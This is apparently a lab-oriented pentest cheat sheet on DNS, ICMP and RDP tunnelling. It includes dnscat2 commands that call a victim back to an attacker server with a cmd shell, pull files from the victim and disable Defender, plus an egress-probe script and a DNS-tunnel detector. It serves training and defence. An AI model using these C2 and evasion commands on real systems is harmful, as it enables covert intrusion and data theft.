🛡️ Methodology Checklist
- Identify which protocols are allowed outbound from pivot
- DNS tunnel (dnscat2): start server on attacker, deploy client on pivot
- ICMP tunnel (ptunnel): start ptunnel server, connect from pivot
- HTTP tunnel (rpivot): start server on attacker, run client on pivot
- Verify tunnel connectivity with a simple test request
- Monitor for latency indicating indirect routing
- Teardown all tunnel processes on exit
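Worked example for the first and sixth checklist items (find out which protocols leave the pivot, then verify with a simple test request). This is an added example, not code from the original page, dnscat2 or ptunnel-ng. It builds the DNS query by hand so it runs on a bare pivot with no dnspython installed. Assumptions: `PROBE_DOMAIN` is a domain delegated (NS record) to a server you control, so the random label lands in that server's query log; `PROBE_HOST`/`PROBE_PORT` is a listener you control; the ICMP check uses Linux `ping` flags.

```python
"""Egress probe for a pivot: which of DNS, ICMP and HTTP/TCP can leave the network?

Added example (not from the original page, dnscat2 or ptunnel-ng). Assumptions:
PROBE_DOMAIN is delegated to an authoritative server you control, PROBE_HOST is an
address you control with a TCP listener on PROBE_PORT, Linux ping flags are used.
"""
import random
import socket
import struct
import subprocess

PROBE_DOMAIN = "tunnel.example"   # assumption: delegated to your authoritative server
PROBE_HOST = "203.0.113.10"       # assumption: your listener (documentation-range placeholder)
PROBE_PORT = 443
EXTERNAL_RESOLVER = "8.8.8.8"     # used only to test direct UDP/53 egress
TIMEOUT = 3.0
QTYPE_TXT = 16


def build_query(name, qtype, txid):
    """Minimal DNS query: header (RD=1, QDCOUNT=1) + one question, class IN."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(lbl)]) + lbl.encode("ascii")
                     for lbl in name.rstrip(".").split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)


def parse_header(msg):
    """Return (txid, is_response, rcode, answer_count) from a raw DNS message."""
    txid, flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    return txid, bool(flags & 0x8000), flags & 0x000F, an


def default_resolver():
    """First nameserver from /etc/resolv.conf (the path dnscat2 'domain=' mode rides)."""
    try:
        with open("/etc/resolv.conf") as fh:
            for line in fh:
                parts = line.split()
                if len(parts) >= 2 and parts[0] == "nameserver":
                    return parts[1]
    except OSError:
        pass
    return "127.0.0.1"


def probe_dns(resolver=None):
    """TXT query for a random label under PROBE_DOMAIN. Any reply (even NXDOMAIN)
    proves the query left the host; check your server's log for the label."""
    name = "p%06x.%s" % (random.getrandbits(24), PROBE_DOMAIN)
    txid = random.getrandbits(16)
    target = resolver or default_resolver()
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(TIMEOUT)
    try:
        sock.sendto(build_query(name, QTYPE_TXT, txid), (target, 53))
        data, _ = sock.recvfrom(4096)
    except OSError as exc:          # socket.timeout is an OSError subclass
        return {"ok": False, "name": name, "resolver": target, "error": str(exc)}
    finally:
        sock.close()
    rid, is_resp, rcode, answers = parse_header(data)
    return {"ok": is_resp and rid == txid, "name": name, "resolver": target,
            "rcode": rcode, "answers": answers}


def probe_icmp(host):
    """ICMP echo via the system ping binary, so no raw socket / root is needed."""
    res = subprocess.run(["ping", "-c", "1", "-W", str(int(TIMEOUT)), host],
                         stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return res.returncode == 0


def probe_tcp(host, port):
    """Plain TCP connect; success means HTTP/HTTPS-style egress is likely open."""
    try:
        with socket.create_connection((host, port), timeout=TIMEOUT):
            return True
    except OSError:
        return False


if __name__ == "__main__":
    via_local = probe_dns()
    via_ext = probe_dns(EXTERNAL_RESOLVER)
    print("DNS via local resolver  :", via_local)
    print("DNS direct to external  :", via_ext)
    print("ICMP echo to PROBE_HOST :", probe_icmp(PROBE_HOST))
    print("TCP %d to PROBE_HOST   :" % PROBE_PORT, probe_tcp(PROBE_HOST, PROBE_PORT))
    print("Now grep your authoritative server's log for:", via_local["name"])
```

Read the two DNS results together: a reply via the local resolver but none from the external one means direct UDP/53 is blocked and dnscat2 must run in `domain=` mode through the internal resolver; no reply from either means DNS is not a usable channel and ICMP is next.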
🎯 Operational Context
Use when: Egress is severely restricted (only DNS or ICMP allowed out) — use protocol-specific tunnels to establish C2 channel through non-standard protocols.
Think Dumber First: DNS tunneling: dnscat2 server on your VPS → `./dnscat --dns server=[ATTACKER],port=53,domain=[DOMAIN] --secret=[SECRET]` on the target (the compiled client binary is `dnscat`; the PowerShell client is shown below). Works through corporate firewalls that allow DNS out, either directly to an external resolver or indirectly via the internal resolver, as long as [DOMAIN] is delegated to your server.
Skip when: HTTP/HTTPS egress is available — DNS/ICMP tunnels are 10-100x slower than HTTP tunnels.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `sudo ruby dnscat2.rb --dns host=[LHOST],port=53,domain=[DOMAIN] --no-cache` | dnscat2: start C2 server (note the `secret=` in output) |
| `Import-Module .\dnscat2.ps1` | Load dnscat2 PowerShell client on victim |
| `Start-Dnscat2 -DNSserver [LHOST] -Domain [DOMAIN] -PreSharedSecret [SECRET] -Exec cmd` | Connect victim back to dnscat2 server |
| `dnscat2> window -i 1` | Interact with session 1 |
| `dnscat2> shell` | Spawn new cmd shell window |
| `exec "type C:\\Users\\Administrator\\flag.txt"` | Execute single command in a dnscat2 session |
| `download C:\\path\\to\\file /local/path` | Download file via dnscat2 (most stable transfer method) |
| `sudo rsync -av --exclude='.git' /opt/ptunnel-ng/ [USER]@[PIVOT_IP]:~/ptunnel-ng/` | Transfer ptunnel-ng source to pivot for native compilation |
| `touch configure src/config.h.in Makefile.in && sudo ./configure && sudo make` | Compile ptunnel-ng on pivot (the `touch` fixes timestamp errors first) |
| `sudo ./src/ptunnel-ng -v` | Start ptunnel-ng server on pivot host (binary is built under `src/`) |
| `sudo ./src/ptunnel-ng -p[PIVOT_IP] -l 2222 -r[PIVOT_IP] -R 22 -v` | ptunnel-ng client: map local:2222 to pivot:22 over ICMP |
| `ssh -p 2222 ubuntu@127.0.0.1` | SSH through ICMP tunnel |
| `ssh -D 9050 -p 2222 ubuntu@127.0.0.1` | SOCKS proxy through ICMP tunnel |
| `regsvr32.exe SocksOverRDP-Plugin.dll` | Register SocksOverRDP DLL on Windows jump host |
| `netstat -an \| findstr 1080` | Verify SocksOverRDP SOCKS listener is active |
🔬 Deep Dive & Workflow
When to Use Each
| Tool | Protocol | Use Case |
|---|---|---|
| Dnscat2 | DNS (TXT, CNAME, MX record types by default) | Firewall blocks TCP/HTTPS but allows DNS; stealthy C2 |
| ptunnel-ng | ICMP (ping) | All TCP/UDP blocked but ping passes through |
| SocksOverRDP | RDP DVC | Windows-only, no SSH, only RDP allowed to jump host |
Dnscat2 — C2 over DNS
Encodes C2 traffic inside DNS queries and responses (TXT, CNAME and MX record types by default). Useful when only DNS egress is allowed (common in locked-down corporate environments). In `domain=` mode the queries travel through the target's normal recursive resolver, so your server must be authoritative for the domain; in `server=` mode the client talks to your server directly and needs UDP/53 egress.
Server setup (Kali):

```bash
cd dnscat2/server/
sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache
# Note the "secret=..." line in the output; the client must present the same pre-shared secret
```

Client setup (Windows victim, run PowerShell as Administrator):

```powershell
Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04... -Exec cmd
```

Interacting with sessions:

```text
dnscat2> windows                                   # list sessions
dnscat2> window -i 1                               # enter session 1
dnscat2> shell                                     # spawn new cmd (creates window 2)
dnscat2> window -i 2                               # switch to the shell window
exec "type C:\\Users\\Administrator\\flag.txt"     # run a single command from the session window
download C:\\path\\to\\file /tmp/file              # file transfer (most stable)
```

Always use double backslashes in Windows paths inside dnscat2. Run PowerShell as Administrator on the victim to avoid `Failed to ConvertTo-Dnscat2Packet` errors.
ptunnel-ng — SSH/SOCKS over ICMP
Wraps TCP traffic (SSH) inside ICMP echo request/reply packets. Requires sudo (raw packet construction).
Architecture mismatch warning: a binary built on an ARM attack host (Apple Silicon) will not run on an x86_64 pivot, so you cannot compile locally and transfer the binary. Instead, "prep local, compile remote":
```bash
# Attack host: prep source (cloned into /opt/ptunnel-ng, the path rsync'd below)
git clone https://github.com/utoni/ptunnel-ng.git /opt/ptunnel-ng
cd /opt/ptunnel-ng
sudo ./autogen.sh
sudo make clean                                  # remove any local binaries before transfer

# Transfer source to pivot
sudo rsync -av --exclude='.git' /opt/ptunnel-ng/ ubuntu@10.129.202.64:~/ptunnel-ng/

# Pivot host: compile natively
ssh ubuntu@10.129.202.64
cd ~/ptunnel-ng
touch configure src/config.h.in Makefile.in      # fix timestamp errors on the rsync'd files
sudo ./configure && sudo make

# Attack host: also compile locally
cd /opt/ptunnel-ng
sudo ./configure && sudo make
```

Establish ICMP tunnel:

```bash
# On pivot host (server): listens for ICMP echo requests carrying tunnel data
sudo ./src/ptunnel-ng -v

# On attack host (client): map local:2222 to pivot:22 via ICMP
sudo ./src/ptunnel-ng -p10.129.202.64 -l 2222 -r10.129.202.64 -R 22 -v

# Use tunnel
ssh -p 2222 ubuntu@127.0.0.1                                   # direct SSH login over ICMP
ssh -D 9050 -p 2222 ubuntu@127.0.0.1                           # SOCKS proxy through the ICMP tunnel
proxychains xfreerdp3 /v:172.16.5.19 /u:victor /p:pass@123     # RDP to an internal host via ICMP
```

SocksOverRDP — SOCKS over RDP Dynamic Virtual Channels
Windows-only. Uses RDP’s built-in DVC mechanism to create a SOCKS proxy over an existing RDP session.
Architecture: Attack Host → Jump Host (Win10) → RDP → Pivot Host (Win) → Target
```powershell
# 1. On Jump Host (elevated prompt): disable Defender real-time protection, register the DLL
Set-MpPreference -DisableRealtimeMonitoring $true
regsvr32.exe SocksOverRDP-Plugin.dll       # must see "DllRegisterServer succeeded" popup

# 2. RDP into Pivot Host via mstsc.exe
#    Popup appears: "SocksOverRDP plugin enabled, listening on 127.0.0.1:1080"

# 3. On Pivot Host (inside the RDP session): transfer SocksOverRDP-Server.exe and run it as Administrator

# 4. Verify listener on Jump Host
netstat -an | findstr 1080                 # TCP 127.0.0.1:1080 LISTENING

# 5. Configure Proxifier on Jump Host
#    Profile → Proxy Servers: 127.0.0.1:1080 SOCKS5
#    Profile → Rules: Default → Proxy SOCKS5

# 6. Double-pivot via a new mstsc window to the final target
#    CRITICAL: Set Experience → Modem (56 kbps) to prevent "Encryption Error"
```

"Encryption Error" fix: high-quality RDP settings cause the handshake to fail when tunneled over RDP. Always set Experience to Modem (56 kbps) for RDP-over-RDP connections.
If DLL disappears: Windows Defender quarantined it. Add folder exclusion before extracting.
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| dnscat2 session very slow | Every packet is chunked into small DNS queries, each taking a full round trip through the target's recursive resolver | ~1-3 KB/s is normal; use it for shell/C2 and small `download`s, and move bulk data over a faster tunnel once you have one |
| DNS tunnel fails | Query never reaches your server: direct UDP/53 egress blocked, or the internal resolver cannot reach your authoritative server | From the target, run `nslookup -type=TXT test.[DOMAIN]` through the default resolver and watch the dnscat2 server output for the query; if only direct mode is blocked, use `domain=` mode via the internal resolver |
| ICMP tunnel stalls or never connects | ICMP echo filtered or rate-limited on the path | Confirm a plain `ping [PIVOT_IP]` works first; under rate limiting the tunnel degrades (retransmits, high latency) rather than failing cleanly. Equivalent legacy ptunnel syntax: `ptunnel -p [PROXY] -lp [LPORT] -da [DEST] -dp [DPORT] -x [PASS]` |
| dnscat2 domain not working | DNS not delegated to your server | Requires an NS record pointing to your server; use a registered domain with proper delegation |
| ptunnel requires root | Needs raw socket access | ICMP tunneling needs root (or CAP_NET_RAW) on both client and server; confirm this on both sides before transferring the source |
📝 Reporting Trigger
Finding Title: C2 Channel Established via DNS Tunneling Through Egress-Filtered Network
Impact: DNS tunneling bypasses egress filtering that blocks HTTP/HTTPS by encoding C2 traffic as DNS queries, maintaining attacker access through firewalls that allow DNS out.
Root Cause: DNS egress permitted without monitoring for tunneling patterns (high-frequency queries, long subdomains, unusual query types). Because a delegated domain resolves through the internal resolver as well, the internal resolver forwards the tunnel traffic just as an external one would.
Recommendation: Implement DNS monitoring for tunneling indicators (high query rates per client, long hex-looking subdomain strings, unusual TXT/CNAME/MX queries, a high ratio of never-repeated names). Force all DNS through an internal resolver and log every query there. Block direct DNS to external resolvers from workloads. Note that blocking external resolvers alone does not stop a delegated-domain tunnel; the logging and alerting on the internal resolver is what catches it.
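To make the recommendation concrete, here is an added detection example (not from the original page or from dnscat2) that scores resolver query logs for the tunneling indicators listed above. The log lines are constructed and use a simplified one-line format `<timestamp> <client_ip> <qname> <qtype>`; the thresholds, the two-label registered-domain approximation and the "hex-only labels" heuristic (dnscat2 hex-encodes its payload into labels) are assumptions to tune against your own baseline.

```python
"""Heuristic DNS-tunnel detector run over resolver query logs.

Added example, not part of the original page or of dnscat2. SAMPLE_LOG is constructed:
client .41 browses normally, client .77 runs a dnscat2-style tunnel to inlanefreight.local.
Adapt parse_line() to your resolver's real format (BIND querylog, Windows DNS analytic
log, Zeek dns.log); the rest of the logic is format-independent.
"""
import math
import re
from collections import Counter, defaultdict
from datetime import datetime

SAMPLE_LOG = """\
2024-05-01T10:00:00 10.20.30.77 www.bing.com A
2024-05-01T10:00:01 10.20.30.41 www.microsoft.com A
2024-05-01T10:00:02 10.20.30.77 3b1c0000010a4f5e7d2c9ab3e8f1.66a4d2c1b9e0f37a.inlanefreight.local TXT
2024-05-01T10:00:02 10.20.30.77 3b1c0000020a4f5e7d2c9ab3e8f1.0d9c8b7a6f5e4d3c.inlanefreight.local CNAME
2024-05-01T10:00:03 10.20.30.41 login.microsoftonline.com A
2024-05-01T10:00:03 10.20.30.77 3b1c0000030a4f5e7d2c9ab3e8f1.5a4b3c2d1e0f9a8b.inlanefreight.local MX
2024-05-01T10:00:03 10.20.30.77 3b1c0000040a4f5e7d2c9ab3e8f1.c3d4e5f6a7b8c9d0.inlanefreight.local TXT
2024-05-01T10:00:04 10.20.30.77 3b1c0000050a4f5e7d2c9ab3e8f1.1e2f3a4b5c6d7e8f.inlanefreight.local TXT
2024-05-01T10:00:04 10.20.30.77 3b1c0000060a4f5e7d2c9ab3e8f1.9f8e7d6c5b4a3928.inlanefreight.local CNAME
2024-05-01T10:00:05 10.20.30.77 3b1c0000070a4f5e7d2c9ab3e8f1.7a6b5c4d3e2f1a0b.inlanefreight.local TXT
2024-05-01T10:00:05 10.20.30.77 3b1c0000080a4f5e7d2c9ab3e8f1.b0a1f2e3d4c5b6a7.inlanefreight.local MX
2024-05-01T10:00:07 10.20.30.41 outlook.office365.com A
2024-05-01T10:00:12 10.20.30.41 www.microsoft.com AAAA
2024-05-01T10:00:15 10.20.30.41 update.microsoft.com A
2024-05-01T10:00:20 10.20.30.41 www.google.com A
"""

RARE_TYPES = {"TXT", "CNAME", "MX", "NULL"}      # dnscat2 defaults to TXT/CNAME/MX
HEX_RE = re.compile(r"^[0-9a-f.]+$")             # dnscat2 hex-encodes payload into labels

# Assumed thresholds; a metric above its threshold counts as one hit
THRESHOLDS = {"qps": 1.0, "mean_sub_len": 30, "mean_entropy": 3.0,
              "rare_share": 0.5, "hex_share": 0.5, "unique_ratio": 0.9}
FLAG_AT = 3                                      # hits needed to flag a client


def parse_line(line):
    """'<iso-timestamp> <client> <qname> <qtype>' -> (datetime, client, qname, qtype)."""
    ts, client, qname, qtype = line.split()
    return datetime.fromisoformat(ts), client, qname.lower().rstrip("."), qtype.upper()


def split_name(qname):
    """Approximate (subdomain, registered domain) as everything left of the last two labels."""
    labels = qname.split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def entropy(s):
    """Shannon entropy in bits per character; hex data sits near 3.5-4, words far lower."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def analyze(lines):
    """Per-client metrics plus a 'suspicious' verdict based on how many thresholds are crossed."""
    per_client = defaultdict(list)
    for line in lines:
        if line.strip():
            rec = parse_line(line)
            per_client[rec[1]].append(rec)
    report = {}
    for client, recs in per_client.items():
        n = len(recs)
        subs = [split_name(q)[0] for _, _, q, _ in recs]
        span = (max(r[0] for r in recs) - min(r[0] for r in recs)).total_seconds()
        m = {
            "queries": n,
            "qps": n / max(span, 1.0),
            "mean_sub_len": sum(map(len, subs)) / n,
            "mean_entropy": sum(map(entropy, subs)) / n,
            "rare_share": sum(r[3] in RARE_TYPES for r in recs) / n,
            "hex_share": sum(bool(s) and bool(HEX_RE.match(s)) for s in subs) / n,
            "unique_ratio": len({r[2] for r in recs}) / n,   # tunnels never repeat a name
        }
        m["hits"] = [k for k, t in THRESHOLDS.items() if m[k] > t]
        m["suspicious"] = len(m["hits"]) >= FLAG_AT
        report[client] = m
    return report


if __name__ == "__main__":
    for client, m in analyze(SAMPLE_LOG.splitlines()).items():
        verdict = "TUNNEL?" if m["suspicious"] else "ok"
        print(f"{client:<14} {verdict:<8} hits={m['hits']} qps={m['qps']:.2f} "
              f"sub_len={m['mean_sub_len']:.1f} entropy={m['mean_entropy']:.2f}")
```

Run it over a day of real logs in rolling windows rather than one pass: `qps` and `unique_ratio` are the indicators that separate a tunnel from a chatty but legitimate SaaS client, while `hex_share` alone will also fire on CDN hostnames, which is why the verdict needs several hits rather than any one.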